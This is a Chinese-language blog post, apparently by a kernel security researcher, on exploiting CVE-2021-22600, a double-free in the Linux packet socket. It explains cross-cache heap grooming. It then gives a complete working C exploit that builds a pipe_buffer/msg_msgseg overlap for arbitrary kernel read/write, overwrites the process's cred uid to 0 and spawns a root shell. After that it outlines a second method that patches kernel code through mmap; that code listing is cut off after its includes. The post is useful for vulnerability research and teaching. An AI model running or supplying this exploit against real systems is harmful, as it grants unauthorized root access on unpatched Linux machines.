虽然笔者选择的内核版本 5.11.16 实际上不存在 GFP_KERNELGFP_KERNEL_ACCOUNT 之间的隔离,利用起来很舒服,但笔者还是决定尝试编写 cross-cache UAF 的攻击方法:

  • 首先堆喷 sk_buff ,分配 pgv 后释放,再堆喷 sk_buff 取回 pgv
  • 将这些 sk_buff 全部释放,从而填满 partial lists,使得 slub page 释放回 buddy system
  • 堆喷 pipe_buffer 以取回这些页面
  • 触发漏洞释放 pgv ,此时我们会有一个 pipe_buffer 被释放回 slub
  • 继续堆喷 pipe_buffer ,每喷一个就检测是否分配到了 victim,当分配到 victim 时跳出
  • 此时我们便有着对同一内核对象的两个 pipe_buffer 引用,且由于我们是检测到 victim 便停止,因此我们可以保证 victim object 必定在 cpu slab 上,从而避免了后续的堆喷过程
  • 最后就是惯例的使用和 pipe_buffer 一样分配自 GFP_KERNEL_ACCOUNTmsg_msgseg 去不停改写 pipe_buffer 以完成对内核空间的任意地址读写,这里有个小点是我们的 pipe 的 head (写起始)与 tail (读起始)都需要从 pipe_buffer[0] 往后至少移动一个,因为 pipe_buffer[0]::pagemsg_msgseg::next 是重叠的,会造成干扰( 依稀记得笔者本科那会在刚发现这种利用手法时调这玩意调了半天

有了内核空间的任意读写权限,基本上就是想做什么做什么了,这里我们选择找到当前进程的 task_struct 并改写 cred 的 uid 为 root,这是一种经典的 data-only 的攻击, 不依赖于特定版本的内核镜像,理论上只要你有这个洞就能成功打

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/prctl.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg) puts(SUCCESS_MSG(msg))
#define log_info(msg) puts(INFO_MSG(msg))
#define log_error(msg) puts(ERR_MSG(msg))

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

void err_exit(char *msg)
{
printf(ERR_MSG("[x] Error at: ") "%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

void get_root_shell(void)
{
if(getuid()) {
log_error("[x] Failed to get the root!");
sleep(5);
exit(EXIT_FAILURE);
}

log_success("[+] Successful to get the root.");
log_info("[*] Execve root shell now...");

system("su root -c sh");

/* to exit the process normally, instead of potential segmentation fault */
exit(EXIT_SUCCESS);
}

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct cred {
long usage;
uint32_t uid;
uint32_t gid;
uint32_t suid;
uint32_t sgid;
uint32_t euid;
uint32_t egid;
uint32_t fsuid;
uint32_t fsgid;
};


int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

#define SOCKET_NUM 32
#define SK_BUFF_NUM 64

int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
/* socket pairs to spray sk_buff */
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0) {
printf("[x] failed to create no.%d socket pair!\n", i);
return -1;
}
}

return 0;
}

int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (write(sk_socket[i][0], buf, size) < 0) {
printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
return -1;
}
}
}

return 0;
}

int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_socket[i][1], buf, size) < 0) {
puts("[x] failed to received sk_buff!");
return -1;
}
}
}

return 0;
}

void print_banner(void)
{
puts(SUCCESS_MSG("--------- CVE-2021-22600 Exploitation ---------"));
puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
puts(SUCCESS_MSG("-------- Local Privilege Escalation ---------\n"));
}

struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
unsigned int tp_retire_blk_tov;
unsigned int tp_sizeof_priv;
unsigned int tp_feature_req_word;
};

enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

#define PACKET_RX_RING 5
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

#define VICTIM_OBJ_SZ 1024

#define SKBUFF_DATA_SZ (VICTIM_OBJ_SZ - 330)

#define TP_BLK_SZ 0x1000
#define TP_BLK_NR (VICTIM_OBJ_SZ / sizeof(char*))
#define TP_FRAME_SZ TP_BLK_SZ
#define TP_FRAME_NR (TP_BLK_SZ * TP_BLK_NR / TP_FRAME_SZ)

struct exp_cmd {
size_t cmd;
};

enum {
CMD_ALLOC_SOCKET = 0,
CMD_SET_VERSION_V2,
CMD_SET_VERSION_V3,
CMD_ALLOC_TX_RING,
CMD_FREE_TX_RING,
CMD_ALLOC_RX_RING,
CMD_FREE_RX_RING,
};

int p2c_pipe[2], c2p_pipe[2];

void exploitation_child(void)
{
struct exp_cmd cmd;
struct tpacket_req req;
int socket_fd, version;
int ret = 0;

unshare_setup();

for (;;) {
read(p2c_pipe[0], &cmd, sizeof(cmd));

switch (cmd.cmd) {
case CMD_ALLOC_SOCKET:
log_info("[*] Creating packet socket...");

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
err_exit("FAILED to create socket");
}

break;
case CMD_SET_VERSION_V2:
log_info("[*] Set socket version to TPACKET_V2...");

version = TPACKET_V2;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
log_error("[x] failed at setsockopt(PACKET_VERSION)");
err_exit("FAILED to use setsockopt to set TPACKET_V2");
}

break;
case CMD_SET_VERSION_V3:
log_info("[*] Set socket version to TPACKET_V3...");

version = TPACKET_V3;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
log_error("[x] failed at setsockopt(PACKET_VERSION)");
err_exit("FAILED to use setsockopt to set TPACKET_V3");
}

break;
case CMD_ALLOC_TX_RING:
log_info("[*] Allocating TX ring buffer...");

memset(&req, 0, sizeof(req));
req.tp_block_size = TP_BLK_SZ;
req.tp_block_nr = TP_BLK_NR;
req.tp_frame_size = TP_FRAME_SZ;
req.tp_frame_nr = TP_FRAME_NR;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_TX_RING)");
err_exit("FAILED to allocate TX ring buffer");
}

break;
case CMD_FREE_TX_RING:
log_info("[*] Freeing TX ring buffer...");

req.tp_block_size = 0x3361626e;
req.tp_block_nr = 0;
req.tp_frame_size = 0x74747261;
req.tp_frame_nr = 0;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_TX_RING)");
err_exit("FAILED to free TX ring buffer");
}

break;
case CMD_ALLOC_RX_RING:
log_info("[*] Allocating RX ring buffer...");

memset(&req, 0, sizeof(req));
req.tp_block_size = TP_BLK_SZ;
req.tp_block_nr = TP_BLK_NR;
req.tp_frame_size = TP_FRAME_SZ;
req.tp_frame_nr = TP_FRAME_NR;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to allocate RX ring buffer");
}

break;
case CMD_FREE_RX_RING:
log_info("[*] Freeing RX ring buffer...");

req.tp_block_size = 0x3361626e;
req.tp_block_nr = 0;
req.tp_frame_size = 0x74747261;
req.tp_frame_nr = 0;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to free RX ring buffer");
}

break;
default:
log_error("[x] Unknown command received from parent!");
break;
}

write(c2p_pipe[1], &ret, sizeof(ret));
}
}

int send_cmd_to_child(size_t cmd_nr)
{
struct exp_cmd cmd = {
.cmd = cmd_nr,
};
int ret;

write(p2c_pipe[1], &cmd, sizeof(cmd));
read(c2p_pipe[0], &ret, sizeof(ret));

return ret;
}

#define MSG_HDR_SZ 0x30
#define MSG_SPRAY_SZ (VICTIM_OBJ_SZ - MSG_HDR_SZ)
#define MSG_SPRAY_NR 2
#define MSG_QUEUE_NR 0x800
#define MSG_TAG_BASE 0x200
#define MSG_EVIL_SZ (0x1000 - MSG_HDR_SZ + VICTIM_OBJ_SZ - 8)

#define ATK_QUEUE_IDX 0

#define PIPE_SPRAY_NR 0x3F0
#define PIPE_FCNTL_SZ (VICTIM_OBJ_SZ / 64 * 0x1000)
#define PIPE_RECLAIM_SZ (512 - MSG_HDR_SZ)

int msg_queue[MSG_QUEUE_NR], garbage_msgs[MSG_QUEUE_NR] = { 0 };
int sk_sockets1[SOCKET_NUM][2], sk_sockets2[SOCKET_NUM][2];
int pipe_fd[PIPE_SPRAY_NR][2], uaf_pipe[2], orig_idx = -1, victim_idx = -1;
struct pipe_buffer *leak_pipe_buf, *fake_pipe_buf;
struct pipe_buf_operations *pipe_ops;
size_t msg_buf[0x2000];

void arbitrary_read_by_pipe(size_t page_addr, void *buf)
{
if (read_msg(msg_queue[ATK_QUEUE_IDX], msg_buf, MSG_EVIL_SZ, 0x400) < 0){
err_exit("FAILED to read msg_msg and msg_msgseg!");
}

fake_pipe_buf = (struct pipe_buffer*) &msg_buf[511];
fake_pipe_buf->page = (struct page*) page_addr;
fake_pipe_buf->len = 0x1ff8;
fake_pipe_buf->offset = 0;
fake_pipe_buf->ops = pipe_ops;

if (write_msg(msg_queue[ATK_QUEUE_IDX], msg_buf, MSG_EVIL_SZ, 0x400) < 0) {
err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
}

if (read(uaf_pipe[0], buf, 0xff0) < 0) {
perror("[x] Unable to read from pipe");
err_exit("FAILED to read from evil pipe!");
}
}

void arbitrary_write_by_pipe(size_t page_addr, void *buf, size_t len)
{
fake_pipe_buf = (struct pipe_buffer*) &msg_buf[516];

if (read_msg(msg_queue[ATK_QUEUE_IDX], msg_buf, MSG_EVIL_SZ, 0x400) < 0){
err_exit("FAILED to read msg_msg and msg_msgseg!");
}

fake_pipe_buf->page = (struct page*) page_addr;
fake_pipe_buf->len = 0;
fake_pipe_buf->offset = 0;
fake_pipe_buf->ops = pipe_ops;

if (write_msg(msg_queue[ATK_QUEUE_IDX], msg_buf, MSG_EVIL_SZ, 0x400) < 0) {
err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
}

len = len > 0xffe ? 0xffe : len;

if(write(uaf_pipe[1], buf, len) < 0) {
perror("[x] Unable to write into pipe");
err_exit("FAILED to write into evil pipe!");
}
}

void exploitation(void)
{
size_t buf[0x2000], kernel_leak, current_pcb_page, *comm_addr;
char *noise_pages;
struct rlimit rl;
int found = 0;
int ret;
uint32_t uid, gid;
uint64_t cred_kaddr, cred_kpage_addr;
struct cred *cred_data;
char cred_data_buf[0x1000];

memset(buf, 0, sizeof(buf));

print_banner();

bind_core(0);

rl.rlim_cur = 4096;
rl.rlim_max = 4096;
if (setrlimit(RLIMIT_NOFILE, &rl) == -1) {
perror("[x] setrlimit");
err_exit("FAILED to expand file descriptor's limit!");
}

log_info("[*] Creating child process to user packet socket...");

if (pipe(p2c_pipe) < 0 || pipe(c2p_pipe) < 0) {
perror("[x] Unable to create pipe");
err_exit("FAILED to create pipe for communication!");
}

ret = fork();
if (!ret) {
exploitation_child();
exit(EXIT_SUCCESS);
} else if (ret < 0) {
perror("[x] Unable to fork out child process");
err_exit("FAILED to create child process for exploit!");
}

send_cmd_to_child(CMD_ALLOC_SOCKET);

log_info("[*] Preparing msg_queue...");

for (int i = 0; i < MSG_QUEUE_NR; i++) {
msg_queue[i] = get_msg_queue();
if (msg_queue[i] < 0) {
printf("[x] Unable to get %d msg_queue\n", i);
err_exit("FAILED to create msg_queue!");
}
}

log_info("[*] Preparing mmap area for clearing noisy pages later...");
noise_pages = mmap(NULL, TP_BLK_NR * 0x1000 * 2, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
if (noise_pages == MAP_FAILED) {
perror("[x] Unable to create mmap region");
err_exit("FAILED to do the mmap!");
}

log_info("[*] Preparing pipe...");

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
if (pipe(pipe_fd[i]) < 0) {
printf("[x] Unable to create %d pipe\n", i);
err_exit("FAILED to prepare pipe!");
}

for (int j = 0; j < 0x100; j++) {
/* identifier */
write(pipe_fd[i][1], &i, sizeof(i));
}

if (fcntl(pipe_fd[i][0], F_SETPIPE_SZ, 0x1000 * 8) < 0) {
perror("[x] Failed to do fcntl on pipe");
printf("[x] Unable to shrink %d pipe_buffer\n", i);
err_exit("FAILED to spray pipe_buffer!");
}
}

log_info("[*] Preparing sk_buff and do the half-spraying...");

if (init_socket_array(sk_sockets1)) {
err_exit("FAILED to initialize socket group 1!");
}

if (init_socket_array(sk_sockets2)) {
err_exit("FAILED to initialize socket group 2!");
}

if (spray_sk_buff(sk_sockets1, buf, SKBUFF_DATA_SZ)) {
err_exit("FAILED spray group-1 sk_buff!");
}

send_cmd_to_child(CMD_SET_VERSION_V3);

send_cmd_to_child(CMD_ALLOC_RX_RING);

send_cmd_to_child(CMD_FREE_RX_RING);

log_info("[*] Clearing noisy pages allocated in pgv...");

for (size_t i = 0; i < TP_BLK_NR * 2; i++) {
*(size_t*) &(noise_pages[i * 0x1000]) = *(size_t*) "arttnba3";
}

log_info("[*] Spraying another half of sk_buff to get pgv...");

if (spray_sk_buff(sk_sockets2, buf, SKBUFF_DATA_SZ)) {
err_exit("FAILED spray group-2 sk_buff!");
}

log_info("[*] Free all sk_buff to fill partial lists and back to buddy...");

if (free_sk_buff(sk_sockets1, buf, SKBUFF_DATA_SZ)) {
err_exit("FAILED free group-1 sk_buff!");
}

if (free_sk_buff(sk_sockets2, buf, SKBUFF_DATA_SZ)) {
err_exit("FAILED free group-2 sk_buff!");
}

log_info("[*] Spraying half of pipe_buffer...");

for (int i = 0; i < (PIPE_SPRAY_NR / 2); i++) {
if (fcntl(pipe_fd[i][0], F_SETPIPE_SZ, PIPE_FCNTL_SZ) < 0) {
perror("[x] Failed to do fcntl on pipe");
printf("[x] Unable to expand %d pipe_buffer\n", i);
err_exit("FAILED to spray pipe_buffer!");
}

/* reclam original pipe_buffer */
if (write_msg(msg_queue[i % MSG_QUEUE_NR], buf, PIPE_RECLAIM_SZ, 0x3361626e74747261) < 0) {
err_exit("FAILED to reclaim pipe_buffer back!");
}

garbage_msgs[i % MSG_QUEUE_NR]++;
}

log_info("[*] Triggerring double free and spraying half of pipe_buffer...");

send_cmd_to_child(CMD_SET_VERSION_V2);
send_cmd_to_child(CMD_FREE_RX_RING);

for (int i = (PIPE_SPRAY_NR / 2); i < PIPE_SPRAY_NR; i++) {
if (fcntl(pipe_fd[i][0], F_SETPIPE_SZ, PIPE_FCNTL_SZ) < 0) {
perror("[x] Failed to do fcntl on pipe");
printf("[x] Unable to expand %d pipe_buffer\n", i);
err_exit("FAILED to spray pipe_buffer!");
}

if (write_msg(
msg_queue[i % MSG_QUEUE_NR],
buf,
PIPE_RECLAIM_SZ,
0x3361626e74747261
) < 0) {
err_exit("FAILED to reclaim pipe_buffer back!");
}

garbage_msgs[i % MSG_QUEUE_NR]++;

for (int j = 0; j < i; j++) {
int nr;

/* at this time, cpu slab is victim pipe_buffer, so no more spray */
read(pipe_fd[j][0], &nr, sizeof(nr));
if (nr != j && nr == i) {
orig_idx = nr;
victim_idx = j;
goto out_pipe;
}
write(pipe_fd[j][1], &nr, sizeof(nr));
}
}

out_pipe:
if (orig_idx < 0 || victim_idx < 0) {
err_exit("FAILED to construct UAF on pipe!");
}

log_success("[+] Successfully made UAF on pipe_buffer!");
printf("[+] Original: %d, victim: %d\n", orig_idx, victim_idx);

close(pipe_fd[orig_idx][1]);
close(pipe_fd[orig_idx][0]);

log_info("[*] Crafting pipe_buffer overlapped with msg_msgseg...");

if (pipe(uaf_pipe) < 0) {
err_exit("FAILED to allocate new pipe for UAF!");
}

/* move to pipe_buffer[1] */
write(uaf_pipe[1], "arttnba3", 8);
read(uaf_pipe[0], buf, 8);
write(uaf_pipe[1], "arttnba3", 8);

close(pipe_fd[victim_idx][1]);
close(pipe_fd[victim_idx][0]);

memset(buf, 0, sizeof(buf));
if (write_msg(msg_queue[ATK_QUEUE_IDX], buf, MSG_EVIL_SZ, 0x400) < 0) {
err_exit("FAILED to create msg_msg with msg_msgseg!");
}

/**
* at this time the pipe was thought to be empty at buf[1],
* so then the new page will ge granded on the buf[2]
*/
write(uaf_pipe[1], "arttnba3", 8);

if (read_msg(msg_queue[ATK_QUEUE_IDX], buf, MSG_EVIL_SZ, 0x400) < 0){
err_exit("FAILED to read msg_msg and msg_msgseg!");
}

/*
for (int i = 0; i < MSG_EVIL_SZ / 8; i++) {
printf("[----data-dump----][%d] %lx\n", i, buf[i]);
}
*/

leak_pipe_buf = (void*) &buf[516];

printf(
SUCCESS_MSG("[+] Leak pipe_buffer::page ") "%p"
SUCCESS_MSG(", pipe_buffer::ops ") "%p\n",
leak_pipe_buf->page,
leak_pipe_buf->ops
);

pipe_ops = (void*) leak_pipe_buf->ops;

vmemmap_base = (size_t) leak_pipe_buf->page & KASLR_MASK;
log_info("[*] Try to guess vmemmap_base...");
printf("[*] Starts from %lx...\n", vmemmap_base);

if (write_msg(msg_queue[ATK_QUEUE_IDX], buf, MSG_EVIL_SZ, 0x400) < 0) {
err_exit("FAILED to create msg_msg with msg_msgseg!");
}

arbitrary_read_by_pipe(vmemmap_base + 0x9d000 / 0x1000 * 0x40, buf);

kernel_leak = buf[0];
/*
for (int i = 0; i < 0xff0 / 8; i++) {
printf("[----data-dump----][%d] %lx\n", i, buf[i]);
}
*/

for (int loop_nr = 0; 1; loop_nr++) {
if (kernel_leak > 0xffffffff81000000
&& (kernel_leak & 0xfff) < 0x100) {
kernel_base = kernel_leak & 0xfffffffffffff000;
if (loop_nr != 0) {
puts("");
}
printf(
INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
);
printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
break;
}

for (int i = 0; i < 80; i++) {
putchar('\b');
}
printf(
"[No.%d loop] Got unmatched data: %lx, keep looping...",
loop_nr,
kernel_leak
);

vmemmap_base -= KASLR_GRANULARITY;
arbitrary_read_by_pipe(
vmemmap_base + 0x9d000 / 0x1000 * 0x40,
buf
);
}

log_info("[*] Seeking task_struct in kernel space...");

prctl(PR_SET_NAME, "arttnba3pwnn");
uid = getuid();
gid = getgid();

for (int i = 0; 1; i++) {
arbitrary_read_by_pipe(vmemmap_base + i * 0x40, buf);

comm_addr = memmem(buf, 0xff0, "arttnba3pwnn", 12);
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-2] == comm_addr[-3])) { /* should be equal */

printf(
SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
(vmemmap_base + i * 0x40)
);
printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);

cred_kaddr = comm_addr[-2];
cred_data = (void*) (cred_data_buf + (cred_kaddr & (0x1000 - 1)));
page_offset_base = cred_kaddr & KASLR_MASK;

while (1) {
cred_kpage_addr = vmemmap_base + \
(cred_kaddr - page_offset_base) / 0x1000 * 0x40;

arbitrary_read_by_pipe(
cred_kpage_addr,
cred_data_buf
);
if (cred_data->uid == uid
&& cred_data->gid == gid) {
printf(
SUCCESS_MSG("[+] Got page_offset_base: ") "%lx\n",
page_offset_base
);
printf(
SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
cred_kpage_addr
);
break;
}

page_offset_base -= KASLR_GRANULARITY;
puts("[?] Looping!?");
}

break;
}
}

puts("[*] Overwriting cred and granting root privilege...");

cred_data->uid = 0;
cred_data->gid = 0;

arbitrary_write_by_pipe(
cred_kpage_addr,
cred_data_buf,
0xff0
);

setresuid(0, 0, 0);
setresgid(0, 0, 0);

get_root_shell();
}

int main(int argc, char **argv, char **envp)
{
exploitation();
return 0;
}

运行即可完成提权,不依赖具体内核镜像的 data-only 攻击只能说是非常舒服了,不过有小概率会没法完成 cross cache 而利用失败:

Exploit:User Space Mapping Attack

这是 360 漏洞安全研究院的 Alpha Lab 在 BlackHat 上给出的一种有点意思的解法,笔者在 d3kcache 给出的第三种利用方法中使用了这种技术的本质,这里来讲一讲这种解法的源头——也就是 Alpha Lab 给 CVE-2021-22600 这个漏洞的预期解法

主要是利用了 pgv 结构体本身的特性:

  • 既然 packet socket 给我们提供了 mmap 映射 pgv 中页面的权能,我们不难想到的是我们可以通过 UAF 漏洞利用其他结构体来改写 pgv 为内核中的其他页面,再通过 mmap 映射到用户空间从而直接完成对内核数据的改写
  • packet socket 的页面映射中存在对页面类型的检查,但是内核镜像部分可以完美通过检查,因此我们可以直接改写内核代码段完成恶意代码执行,比较容易想到的是修改 ns_capable_setid 这个在 setresuid() 中进行权限检查的函数使其永远返回检查通过,从而让我们能够直接修改自身 uid gid
  • 对于内核地址的泄漏还是老办法:先读出堆上地址,然后根据 KASLR 的粒度去猜 page_offset_base ,如果在 page_offset_base + 0x9d000 找到一个指向 secondary_startup_64 的指针那内核代码段基地址就有了,之后把 pgv[0] 改成 ns_capable_setid 后 mmap 修改即可

这里有一点需要注意的是 我们不能在 pgv 中长期持有指向内核代码段的指针 (因为会有个 非常sb的 定时器做检查),因此我们需要在 mmap 修改完之后马上 munmap 再用 sk_buffpgv[0] 修改回原值,否则会因为定时器尝试读写 pgv[0] 指向的 kernel 代码段而导致 kernel crash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
